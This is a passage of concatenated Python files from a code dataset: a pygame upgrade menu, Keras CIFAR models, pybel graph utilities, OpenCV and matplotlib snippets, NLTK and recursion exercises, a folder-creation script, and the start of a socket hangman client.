self.attack_button.get_rect()\r\n\t\tself.attack_button_rect.midbottom = self.bg_attack_rect.midbottom\r\n\t\tself.attack_button_rect.y -= 30\r\n\t\tself.attack_button_rect.x += 3\r\n\r\n\t\t#draw button for defense upgrade\r\n\t\tself.defense_button = self.button\r\n\t\tself.defense_button_rect = self.defense_button.get_rect()\r\n\t\tself.defense_button_rect.midbottom = self.bg_defense_rect.midbottom\r\n\t\tself.defense_button_rect.y -= 30\r\n\t\tself.defense_button_rect.x += 3\r\n\r\n\t\t#draw button for capacity upgrade\r\n\t\tself.capacity_button = self.button\r\n\t\tself.capacity_button_rect = self.capacity_button.get_rect()\r\n\t\tself.capacity_button_rect.midbottom = self.bg_capacity_rect.midbottom\r\n\t\tself.capacity_button_rect.y -= 30\r\n\t\tself.capacity_button_rect.x += 3\r\n\r\n\t\t#draw button to exit\r\n\t\tself.exit = pygame.image.load(\"img/upgrader/silang.png\")\r\n\t\tself.exit_rect = self.exit.get_rect()\r\n\t\tself.exit_rect.topright = self.screen_rect.topright\r\n\r\n\t\t#draw buttons\r\n\t\tself.screen.blit(self.attack_button, self.attack_button_rect)\r\n\t\tself.screen.blit(self.defense_button, self.defense_button_rect)\r\n\t\tself.screen.blit(self.capacity_button, self.capacity_button_rect)\r\n\t\tself.screen.blit(self.exit, self.exit_rect)\r\n\r\n\t\t#draw button text for each button\r\n\t\tself.button_font = pygame.font.SysFont(\"centuryschoolbook\", 20)\r\n\t\tself.text = self.button_font.render(\"Upgrade\", 1, (255, 255, 255))\r\n\t\tself.rect_attack = (163, 414)\r\n\t\tself.rect_defense = (443, 414)\r\n\t\tself.rect_capacity = (722, 414)\r\n\r\n\t\t#draw text\r\n\t\tself.screen.blit(self.text, self.rect_attack)\r\n\t\tself.screen.blit(self.text, self.rect_defense)\r\n\t\tself.screen.blit(self.text, self.rect_capacity)\r\n\r\n\tdef show_price(self):\r\n\t\tself.token_font = pygame.font.SysFont(\"centuryschoolbook\", 30)\r\n\t\tself.price_attack = self.stats.price_attack\r\n\t\tself.price_defense = self.stats.price_defense\r\n\t\tself.price_hp = self.stats.price_hp\r\n\r\n\t\tself.price_attack_token = str(self.stats.price_attack)\r\n\t\ttoken_color = 255, 255, 255\r\n\t\tself.text_attack = self.token_font.render(self.price_attack_token , True, token_color)\r\n\t\tself.text_rect_attack = self.text_attack.get_rect()\r\n\t\tself.text_rect_attack.center = self.bg_attack_rect.center\r\n\t\tself.text_rect_attack.x += 15\r\n\t\tself.text_rect_attack.y += 10\r\n\r\n\t\tself.price_defence_token = str(self.stats.price_defense)\r\n\t\tself.text_defense = self.token_font.render(self.price_defence_token , True, token_color)\r\n\t\tself.text_rect_defense = self.text_defense.get_rect()\r\n\t\tself.text_rect_defense.center = self.bg_defense_rect.center\r\n\t\tself.text_rect_defense.x += 20\r\n\t\tself.text_rect_defense.y += 10\r\n\r\n\t\tself.price_hp_token = str(self.stats.price_hp)\r\n\t\tself.text_hp = self.token_font.render(self.price_hp_token , True, token_color)\r\n\t\tself.text_rect_hp = self.text_hp.get_rect()\r\n\t\tself.text_rect_hp.center = self.bg_capacity_rect.center\r\n\t\tself.text_rect_hp.x += 17\r\n\t\tself.text_rect_hp.y += 10\r\n\r\n\t\tself.token1 = self.token.token\r\n\t\tself.token1_rect = self.token1.get_rect()\r\n\t\tself.screen.blit(self.token1, self.token1_rect)\r\n\t\tself.token2 = self.token.token\r\n\t\tself.token2_rect = self.token2.get_rect()\r\n\t\tself.screen.blit(self.token2, self.token2_rect)\r\n\t\tself.token3 = self.token.token\r\n\t\tself.token3_rect = self.token3.get_rect()\r\n\t\tself.screen.blit(self.token3, self.token3_rect)\r\n\r\n\t\tself.token1_rect.center = self.bg_attack_rect.center\r\n\t\tself.token1_rect.x -= 25\r\n\t\tself.token1_rect.y += 10\r\n\t\tself.token2_rect.center = self.bg_defense_rect.center\r\n\t\tself.token2_rect.x -= 20\r\n\t\tself.token2_rect.y += 10\r\n\t\tself.token3_rect.center = self.bg_capacity_rect.center\r\n\t\tself.token3_rect.x -= 23\r\n\t\tself.token3_rect.y += 10\r\n\r\n\t\tself.screen.blit(self.token1, self.token1_rect)\r\n\t\tself.screen.blit(self.token2, self.token2_rect)\r\n\t\tself.screen.blit(self.token3, self.token3_rect)\r\n\r\n\t\tself.screen.blit(self.text_attack, self.text_rect_attack)\r\n\t\tself.screen.blit(self.text_hp, self.text_rect_hp)\r\n\t\tself.screen.blit(self.text_defense, self.text_rect_defense)\r\n\r\n\tdef show_statement(self):\r\n\t\tself.text_font = pygame.font.SysFont(\"centuryschoolbook\", 20)\r\n\t\tself.color_text = 255, 255, 255\r\n\t\tself.attack_text = self.text_font.render(\"Attack : +2\", True, self.color_text)\r\n\t\tself.attack_text_rect = self.attack_text.get_rect()\r\n\t\tself.attack_text_rect.center = self.bg_attack_rect.center\r\n\t\tself.attack_text_rect.y -= 30\r\n\r\n\t\tself.defense_text = self.text_font.render(\"Defense : +1\", True, self.color_text)\r\n\t\tself.defense_text_rect = self.defense_text.get_rect()\r\n\t\tself.defense_text_rect.center = self.bg_defense_rect.center\r\n\t\tself.defense_text_rect.y -= 30\r\n\r\n\t\tself.hp_text = self.text_font.render(\"Max hp : +10\", True, self.color_text)\r\n\t\tself.hp_text_rect = self.hp_text.get_rect()\r\n\t\tself.hp_text_rect.center = self.bg_capacity_rect.center\r\n\t\tself.hp_text_rect.y -= 30\r\n\r\n\t\tself.screen.blit(self.attack_text, self.attack_text_rect)\r\n\t\tself.screen.blit(self.defense_text, self.defense_text_rect)\r\n\t\tself.screen.blit(self.hp_text, self.hp_text_rect)","sub_path":"aset/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":8043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"23380766","text":"#==============================================================================\n# Pre-defined nets for Keras\n# Each returns a Keras model and an optimizer function\n# Sourya Dey, USC\n#==============================================================================\n\n#==============================================================================\n#==============================================================================\n# # Imports\n#==============================================================================\n#==============================================================================\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D,MaxPooling2D,Flatten,Dense,Dropout,Activation\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.regularizers import l2\n#==============================================================================\n\n\n#==============================================================================\n#==============================================================================\n# # General CL functions\n#==============================================================================\n#==============================================================================\ndef any_cl_only(config, activation='relu', output_activation='softmax', kernel_initializer='he_normal', bias_initializer='zeros', kernel_regularizer=l2(0.)):\n '''\n Any MLP network\n lr and decay are set to defaults for Adam as in Keras\n '''\n model = Sequential()\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n return model\n\n\ndef add_cls(model, config, activation='relu', output_activation='softmax', kernel_initializer='he_normal', bias_initializer='zeros', kernel_regularizer=l2(0.)):\n '''\n Helper function to add CLs to any EXISTING model\n Inputs:\n model: Existing model\n config: Must know what the exact shape of CL portion is\n Eg: If adding CLs to a CIFAR net with CNNs, then we must know what the number of neurons after flattening is\n Eg: cifar_gitblog1_example gives 4096 neurons after flattening, so maybe config = np.array([4096,512,10])\n kernel_initializer, bias_initializer, kernel_regularizer: Use the same for all layers\n Use activation for all hidden layers, output_activation for output layer\n Output:\n Model with CLs attached\n Possible improvement:\n Add dropout as as ndarray input with size = len(config)-1\n '''\n for i in range(1,len(config)):\n if i==len(config)-1: #Use output_activation for output layer and name it 'output'\n model.add(Dense(config[i], input_shape=(config[i-1],), activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer, name='output'))\n else: #Standard hidden layers\n model.add(Dense(config[i], input_shape=(config[i-1],), activation=activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer))\n return model\n#==============================================================================\n\n\n\ndef cifar_deep(config=np.array([4096,512,10]), activation='relu', output_activation='softmax', kernel_initializer='he_normal',\n bias_initializer='zeros', kernel_regularizer=l2(0.), dropout=0.5):\n '''\n dropout: Fraction of units to DROP, i.e. set to 0. for no dropout\n '''\n model = Sequential()\n model.add(Conv2D(60, (3, 3), padding='same', input_shape=(32,32,3))) #note that conv layers have no regularizer, but they do have dropout\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(60, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Conv2D(125, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(125, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Conv2D(250, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(Conv2D(250, (3, 3), padding='same'))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(dropout))\n\n model.add(Flatten(name='flatten_before_mlp'))\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n# NOTE: Original code uses dropout(0.5) in between any 2 CLs\n#==============================================================================\n# opt = SGD(lr=lr,decay=decay,momentum=0.9)\n# opt = Adam(lr=lr, decay=decay)\n#==============================================================================\n return model\n\n\ndef cifar_shallow(config=np.array([4000,500,100]), activation='relu', output_activation='softmax', kernel_initializer='he_normal',\n bias_initializer='zeros', kernel_regularizer=l2(0.), dropout=0.25):\n '''\n Intentionally make it harder for MLP by reducing the amount of feature extraction via CNN\n '''\n model = Sequential()\n model.add(Conv2D(250, (5, 5), padding='same', input_shape=(32,32,3)))\n model.add(BatchNormalization(axis=3))\n model.add(Activation(activation))\n model.add(MaxPooling2D(pool_size=(8, 8)))\n model.add(Dropout(dropout))\n\n model.add(Flatten(name='flatten_before_mlp'))\n model = add_cls(model, config, activation=activation, output_activation=output_activation, kernel_initializer=kernel_initializer, bias_initializer=bias_initializer, kernel_regularizer=kernel_regularizer)\n return model\n","sub_path":"keras_nets.py","file_name":"keras_nets.py","file_ext":"py","file_size_in_byte":6230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"493099533","text":"\"\"\"\n\nThis module contains functions that help mutate a network\n\n\"\"\"\n\nimport logging\nfrom collections import defaultdict\n\nfrom pybel.canonicalize import calculate_canonical_name\nfrom pybel.constants import *\nfrom .constants import INFERRED_INVERSE, CNAME\n\nlog = logging.getLogger(__name__)\n\n\ndef left_merge(g, h):\n \"\"\"Adds nodes and edges from H to G, in-place for G\n\n :param g: A BEL Graph\n :type g: pybel.BELGraph\n :param h: A BEL Graph\n :type h: pybel.BELGraph\n \"\"\"\n\n for node, data in h.nodes_iter(data=True):\n if node not in g:\n g.add_node(node, data)\n\n for u, v, k, d in h.edges_iter(keys=True, data=True):\n\n if k < 0: # unqualified edge that's not in G yet\n if v not in g.edge[u] or k not in g.edge[u][v]:\n g.add_edge(u, v, key=k, attr_dict=d)\n elif v not in g.edge[u]:\n g.add_edge(u, v, attr_dict=d)\n elif any(0 <= gk and d == gd for gk, gd in g.edge[u][v].items()):\n continue\n else:\n g.add_edge(u, v, attr_dict=d)\n\n\ndef collapse_nodes(graph, dict_of_sets_of_nodes):\n \"\"\"Collapses all nodes in values to the key nodes in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :param dict_of_sets_of_nodes: A dictionary of {node: set of nodes}\n :type dict_of_sets_of_nodes: dict\n \"\"\"\n\n for key_node, value_nodes in dict_of_sets_of_nodes.items():\n for value_node in value_nodes:\n for successor in graph.successors_iter(value_node):\n for key, data in graph.edge[value_node][successor].items():\n if key >= 0:\n graph.add_edge(key_node, successor, attr_dict=data)\n elif successor not in graph.edge[key_node] or key not in graph.edge[key_node][successor]:\n graph.add_edge(key_node, successor, key=key, **{RELATION: unqualified_edges[-1 - key]})\n\n for predecessor in graph.predecessors_iter(value_node):\n for key, data in graph.edge[predecessor][value_node].items():\n if key >= 0:\n graph.add_edge(predecessor, key_node, attr_dict=data)\n elif predecessor not in graph.pred[key_node] or key not in graph.edge[predecessor][key_node]:\n graph.add_edge(predecessor, key_node, key=key, **{RELATION: unqualified_edges[-1 - key]})\n\n graph.remove_node(value_node)\n\n # Remove self edges\n for u, v, k in graph.edges(keys=True):\n if u == v:\n graph.remove_edge(u, v, k)\n\n\n# TODO improve edge traversal efficiency from 2|E| to |E| with something like a disjoint union agglomeration\ndef build_central_dogma_collapse_dict(graph):\n \"\"\"Builds a dictionary to direct the collapsing on the central dogma\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :return: A dictionary of {node: set of nodes}\n :rtype: dict\n \"\"\"\n collapse_dict = defaultdict(set)\n\n r2p = {}\n\n for rna_node, protein_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSLATED_TO:\n continue\n\n collapse_dict[protein_node].add(rna_node)\n r2p[rna_node] = protein_node\n\n for gene_node, rna_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSCRIBED_TO:\n continue\n\n if rna_node in r2p:\n collapse_dict[r2p[rna_node]].add(gene_node)\n else:\n collapse_dict[rna_node].add(gene_node)\n\n return collapse_dict\n\n\ndef build_central_dogma_collapse_gene_dict(graph):\n \"\"\"Builds a dictionary to direct the collapsing on the central dogma\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :return: A dictionary of {node: set of nodes}\n :rtype: dict\n \"\"\"\n collapse_dict = defaultdict(set)\n\n r2g = {}\n for gene_node, rna_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSCRIBED_TO:\n continue\n\n collapse_dict[gene_node].add(rna_node)\n r2g[rna_node] = gene_node\n\n for rna_node, protein_node, d in graph.edges_iter(data=True):\n if d[RELATION] != TRANSLATED_TO:\n continue\n\n if rna_node not in r2g:\n raise ValueError('Should complete origin before running this function')\n\n collapse_dict[r2g[rna_node]].add(protein_node)\n\n return collapse_dict\n\n\ndef collapse_by_central_dogma(graph):\n \"\"\"Collapses all nodes from the central dogma (GENE, RNA, PROTEIN) to PROTEIN, or most downstream possible entity, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n collapse_dict = build_central_dogma_collapse_dict(graph)\n log.info('Collapsing %d groups', len(collapse_dict))\n collapse_nodes(graph, collapse_dict)\n\n\ndef collapse_by_central_dogma_to_genes(graph):\n \"\"\"Collapses all nodes from the central dogma (GENE, RNA, PROTEIN) to GENE in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n collapse_dict = build_central_dogma_collapse_gene_dict(graph)\n log.info('Collapsing %d groups', len(collapse_dict))\n collapse_nodes(graph, collapse_dict)\n\n\ndef collapse_variants_to_genes(graph):\n \"\"\"Finds all protein variants that are pointing to a gene and not a protein and fixes them\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] != PROTEIN:\n continue\n if VARIANTS not in data:\n continue\n if any(d[RELATION] == TRANSCRIBED_TO for u, v, d in graph.in_edges_iter(data=True)):\n graph.node[node][FUNCTION] = GENE\n\n\ndef _infer_converter_helper(node, data, new_function):\n new_tup = list(node)\n new_tup[0] = new_function\n new_tup = tuple(new_tup)\n new_dict = data.copy()\n new_dict[FUNCTION] = new_function\n return new_tup, new_dict\n\n\ndef infer_central_dogmatic_translations(graph):\n \"\"\"For all Protein entities, adds the missing origin RNA and RNA-Protein translation edge\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] == PROTEIN and NAMESPACE in data and VARIANTS not in data:\n new_tup, new_dict = _infer_converter_helper(node, data, RNA)\n graph.add_node(new_tup, attr_dict=new_dict)\n graph.add_edge(new_tup, node, key=unqualified_edge_code[TRANSLATED_TO], **{RELATION: TRANSLATED_TO})\n\n\ndef infer_central_dogmatic_transcriptions(graph):\n \"\"\"For all RNA entities, adds the missing origin Gene and Gene-RNA transcription edge\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes(data=True):\n if data[FUNCTION] == RNA and NAMESPACE in data and VARIANTS not in data:\n new_tup, new_dict = _infer_converter_helper(node, data, GENE)\n graph.add_node(new_tup, attr_dict=new_dict)\n graph.add_edge(new_tup, node, key=unqualified_edge_code[TRANSCRIBED_TO], **{RELATION: TRANSCRIBED_TO})\n\n\ndef infer_central_dogma(graph):\n \"\"\"Adds all RNA-Protein translations then all Gene-RNA transcriptions by applying\n :code:`infer_central_dogmatic_translations` then :code:`infer_central_dogmatic_transcriptions`\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogmatic_translations(graph)\n infer_central_dogmatic_transcriptions(graph)\n\n\ndef opening_by_central_dogma(graph):\n \"\"\"Performs origin completion then collapsing to furthest downstream, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogma(graph)\n collapse_by_central_dogma(graph)\n\n\ndef opening_by_central_dogma_to_genes(graph):\n \"\"\"Performs origin completion then collapsing to gene, in place\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n infer_central_dogma(graph)\n collapse_by_central_dogma_to_genes(graph)\n\n\ndef prune_by_namespace(graph, function, namespace):\n \"\"\"Prunes all nodes of a given namespace\n\n This might be useful to exclude information learned about distant species, such as excluding all information\n from MGI and RGD in diseases where mice and rats don't give much insight to the human disease mechanism.\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :param function: The function to filter\n :type function: str\n :param namespace: The namespace to filter\n :type namespace: str\n \"\"\"\n to_prune = []\n\n for node, data in graph.nodes_iter(data=True):\n if function == data[FUNCTION] and NAMESPACE in data and namespace == data[NAMESPACE]:\n to_prune.append(node)\n\n graph.remove_nodes_from(to_prune)\n\n\ndef prune_by_type(graph, function=None, prune_threshold=1):\n \"\"\"Removes all nodes in graph (in-place) with only a connection to one node. Useful for gene and RNA.\n Allows for optional filter by function type.\n\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n :param function: If set, filters by the node's function from :code:`pybel.constants` like :code:`GENE`, :code:`RNA`,\n :code:`PROTEIN`, or :code:`BIOPROCESS`\n :type function: str\n :param prune_threshold: Removes nodes with less than or equal to this number of connections. Defaults to :code:`1`\n :type prune_threshold: int\n :return: The number of nodes pruned\n :rtype: int\n \"\"\"\n to_prune = []\n\n for gene, data in graph.nodes_iter(data=True):\n if len(graph.adj[gene]) <= prune_threshold and (not function or function == data.get(FUNCTION)):\n to_prune.append(gene)\n\n graph.remove_nodes_from(to_prune)\n\n return len(to_prune)\n\n\ndef prune(graph):\n \"\"\"Prunes genes, then RNA, in place\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n\n \"\"\"\n prune_by_type(graph, GENE)\n prune_by_type(graph, RNA)\n\n\ndef add_inferred_edges(graph, relations):\n \"\"\"Adds inferred edges based on pre-defined axioms\n\n :param graph: a BEL network\n :type graph: pybel.BELGraph\n :param relations: single or iterable of relation names to add their inverse inferred edges\n :type relations: str or list\n \"\"\"\n\n if isinstance(relations, str):\n return add_inferred_edges(graph, [relations])\n\n for relation in relations:\n for u, v in graph.edges_iter(**{RELATION: relation}):\n graph.add_edge(v, u, key=unqualified_edge_code[relation], **{RELATION: INFERRED_INVERSE[relation]})\n\n\n# TODO: Implement\ndef add_inferred_two_way_edge(graph, u, v):\n \"\"\"If a two way edge exists, and the opposite direction doesn't exist, add it to the graph\n\n Use: two way edges from BEL definition and/or axiomatic inverses of membership relations\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n :param u: the source node\n :type u: tuple\n :param v: the target node\n :type v: tuple\n \"\"\"\n raise NotImplementedError\n\n\ndef add_canonical_names(graph):\n \"\"\"Adds a canonical name to each node's data dictionary if they are missing\n\n :param graph: A BEL Graph\n :type graph: pybel.BELGraph\n \"\"\"\n for node, data in graph.nodes_iter(data=True):\n if CNAME in data:\n log.debug('Canonical name already in dictionary for %s', data[CNAME])\n continue\n\n graph.node[node][CNAME] = calculate_canonical_name(graph, node)\n\n\ndef parse_authors(graph):\n \"\"\"Parses all of the citation author strings to lists by splitting on the pipe character \"|\"\n\n :param graph: A BEL graph\n :type graph: pybel.BELGraph\n \"\"\"\n for u, v, k in graph.edges_iter(keys=True):\n if CITATION not in graph.edge[u][v][k]:\n continue\n\n if CITATION_AUTHORS not in graph.edge[u][v][k][CITATION]:\n continue\n\n authors = graph.edge[u][v][k][CITATION][CITATION_AUTHORS]\n\n if not isinstance(authors, str):\n continue\n\n graph.edge[u][v][k][CITATION][CITATION_AUTHORS] = list(authors.split('|'))\n\n\ndef serialize_authors(graph):\n \"\"\"Recombines all authors with the pipe character \"|\"\n\n :param graph: A BEL graph\n :type graph: pybel.BELGraph\n \"\"\"\n for u, v, k in graph.edges_iter(keys=True):\n if CITATION not in graph.edge[u][v][k]:\n continue\n\n if CITATION_AUTHORS not in graph.edge[u][v][k][CITATION]:\n continue\n\n authors = graph.edge[u][v][k][CITATION][CITATION_AUTHORS]\n\n if not isinstance(authors, list):\n continue\n\n graph.edge[u][v][k][CITATION][CITATION_AUTHORS] = '|'.join(authors)\n","sub_path":"src/pybel_tools/mutation.py","file_name":"mutation.py","file_ext":"py","file_size_in_byte":12576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"197062590","text":"import numpy as np\r\nimport cv2\r\ndrawing = False\r\na1 = []\r\nb1 = []\r\nimg = cv2.imread('cameraman.tif',0)\r\nimg1 = cv2.imread('cameraman.tif',0)\r\nimg2 = img.copy()\r\nimg3 = img.copy()\r\nimg4 = np.zeros((1024,1024), np.uint8)\r\ndef draw_line(event,x,y,flags,param):\r\n global imgg,img,a1\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n a1.append((x,y))\r\n elif event== cv2.EVENT_LBUTTONUP:\r\n a1.append((x,y))\r\n imgg = img[a1[-2][1]:a1[-1][1], a1[-2][0]:a1[-1][0]].copy()\r\n cv2.rectangle(img, a1[-1], a1[-2],(0,0,0),3)\r\n img2 = imgg.copy()\r\n \r\ndef draw_line1(event,x,y,flags,param):\r\n global img1,imgg1,b1\r\n if event == cv2.EVENT_LBUTTONDOWN:\r\n b1.append((x,y))\r\n elif event== cv2.EVENT_LBUTTONUP:\r\n b1.append((x,y))\r\n imgg1 = img[b1[-2][1]:b1[-1][1], b1[-2][0]:b1[-1][0]].copy()\r\n cv2.rectangle(img1, b1[-2], b1[-1],(0,0,0),3)\r\n img3 = imgg1.copy()\r\n\r\ncv2.namedWindow('image')\r\ncv2.namedWindow('image1')\r\ncv2.imshow('image',img)\r\ncv2.imshow('image1',img1)\r\ncv2.moveWindow('image1', 200, 200)\r\ncv2.moveWindow('image', 10, 10)\r\ncv2.setMouseCallback('image',draw_line)\r\ncv2.setMouseCallback('image1',draw_line1)\r\n\r\nwhile(1):\r\n cv2.imshow('image',img)\r\n cv2.imshow('image1',img1)\r\n if cv2.waitKey(1) & 0xFF == 27:\r\n a = b1[-1][1]-b1[-2][1]\r\n b = b1[-1][0]-b1[-2][0]\r\n c = a1[-1][0]-a1[-2][0]\r\n d = a1[-1][1]-a1[-2][1]\r\n m = c+b\r\n \r\n if d > a:\r\n maxi = d\r\n else:\r\n maxi = a\r\n img4[0:d, 0:c] = img2[a1[-2][1]:a1[-1][1], a1[-2][0]:a1[-1][0]].copy()\r\n img4[0:a ,c:m] = img3[b1[-2][1]:b1[-1][1], b1[-2][0]:b1[-1][0]].copy()\r\n img4 = img4[0:maxi,0:m].copy()\r\n cv2.imwrite('pict_4.jpg',img4)\r\n break\r\ncv2.destroyAllWindows()\r\n\r\n","sub_path":"labworks/coi/1/my4.py","file_name":"my4.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"71397109","text":"\"\"\"\n @Time : 2020/8/6 9:13 \n @Author : fate\n @Site : \n @File : hist.py\n @Software: PyCharm\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnp.random.seed(0)\nmu, sigma = 100, 20 # 均值 标准差\na = np.random.normal(mu, sigma, size=100)\n# print(a)\n\n# 20 == 直方图的个数\nplt.hist(a, 20, density=1, histtype='stepfilled', facecolor='b', alpha=0.75)\nplt.title('Histogram')\n\nplt.show()\n","sub_path":"数据分析/matplotlib_test/hist.py","file_name":"hist.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"426333005","text":"import nltk\nfrom nltk.corpus import brown\ncfd = nltk.ConditionalFreqDist(\n (genre,word)\n for genre in brown.categories()\n for word in brown.words(categories = genre))\ngenres = ['news', 'religion', 'hobbies', 'science_fiction', 'romance', 'humor']\nmodals = ['can', 'could', 'may', 'might', 'must', 'will']\ncfd.tabulate(conditions = genres, samples = modals)\n'''\nObserve that the most frequent modal in the news genre is will, while the most frequent\nmodal in the romance genre is could. Would you have predicted this? The idea that\nword counts might distinguish genres will be taken up again in Chapter 6.\n'''","sub_path":"Models/nltkLearn/systematically.py","file_name":"systematically.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"185542239","text":"import os\n\nprint('''Modes of operation: \n\\n1. Manual Mode - A mode where the user provides all the names of folders and sub-folders.\n\\n2. Automatic Mode - A mode where only the name (with complete location) of the text file is \ngiven which contains a list of names for the folders and the parent folder is named after the name of the text file\\n''')\n\nmode=int(input(\"Enter Mode: \"))\n\nif mode==1:\n print('''STEPS:\n \\n1. Choose the location to make directories and/or sub-directories.\n \\n2. Enter the name of the parent directory.\n \\n3. Enter the number of sub-directories to be created\n \\n4. Give the name to the corresponding sub-directories.''')\n path = input(\"Enter Location (provide full path) \\n: \")\n if path.lower()=='this':\n path=os.getcwd()\n path = path.replace(\"/\", \"\\\\\")\n if os.path.exists(path):\n os.chdir(path)\n name = input(\"Enter name of parent directory: \")\n os.mkdir(path+\"\\\\\"+name)\n folder = int(input(\"How my folders? \\n: \"))\n for i in range(folder):\n os.mkdir(path+\"\\\\\"+name+\"\\\\\"+input(\"Folder \" + str(i+1) + \" name: \"))\n else:\n print(\"No such path exists. Provide correct path\")\n print(\"Task completed successfully\")\n\nelif mode==2:\n print(\"File(s) : \" ,[i for i in os.listdir() if os.path.isfile(i)==True])\n file=input(\"Enter file: \")\n file_=file[0:-4]+\"\\\\\"\n with open(file,'r') as f:\n if os.path.exists(file_)==False:\n os.mkdir(file_)\n for i in f.readlines():\n if '\\n' in i:\n i=i[0:-1]\n i=i.replace(\":\",\" -\")\n os.mkdir(file_+i)\n print(\"Task completed successfully\")\nelse:\n print(\"Error: Wrong option provided\")\n","sub_path":"set_folders_for_me/set_folders_for_me.py","file_name":"set_folders_for_me.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"375857149","text":"# There are comments with the names of\n# the required functions to build.\n# Please paste your solution underneath\n# the appropriate comment.\n\n# factorial\ndef factorial(n):\n if n < 0:\n raise ValueError\n elif n == 0:\n return 1\n\n return factorial(n-1) * n\n\n# reverse\ndef reverse(text):\n if len(text) == 0 or len(text) == 1:\n return text\n \n return text[-1] + reverse(text[:-1])\n \n\n# bunny\ndef bunny(count):\n if count == 0:\n return 0\n \n return 2 + bunny(count-1)\n \n\n# is_nested_parens\n\ndef is_nested_parens(parens, left_index=0):\n right_index = len(parens) - 1- left_index\n\n if not parens or left_index > right_index:\n return True\n \n elif parens[left_index] == \"(\" and parens[right_index] == \")\":\n return is_nested_parens(parens, left_index+1)\n \n else:\n return False\n \n","sub_path":"part-1.py","file_name":"part-1.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"8939873","text":"import socket\nimport threading\nimport time , sys\nimport tkinter as tk\nfrom tkinter import messagebox\n\nglobal name #nombre del hilo que esta siendo usado\nglobal quit #si un jugador decide dejar el juego, esta variable será True\nglobal actualwrd #palabra puesta actualmente\nglobal word_set #Checa si una palabra esta puesta o no(True o False)\nglobal used_bar #Barra donde van las letras usadas (borra las letras cuando es False)\nglobal counter #Contador de intentos hasta que termine el juego\n\n##--------------------------------------------------------------------------------\n# inicialización de variables globales\n##--------------------------------------------------------------------------------\n\ncounter = 0\nword_set = 'False'\nused_bar = 'False'\nactualwrd = '*'\nname = ''\nquit = False\nservername = '127.0.0.1'\nport = 0\nserverport = 12000\n\n##--------------------------------------------------------------------------------\n# declaración de funciones\n#---------------------------------------------------------------------------------\n# Esta función manejará la recepción de los mensajes del servidor.\n# Y los imprimirá en la GUI.\n# Esta función es un hilo aparte y recibe el nombre de la ventana donde debe imprimir (chat),\n# un socket (sock) y un parametro en blanco (name).\n# Decodifica los comandos recibidos del servidor y los ejecuta.\n#---------------------------------------------------------------------------------\ndef recieveMsg( name , sock , chat ):\n print(\"Iniciado\")\n global quit, block, word_set, usedletter, actualwrd\n text = tk.Text(chat , width = 50 , height = 20 , yscrollcommand = s.set )\n s.config( command = text.yview)\n text.pack(side = tk.LEFT)\n while quit == False:\n try:\n msg, addr = sock.recvfrom( 1024 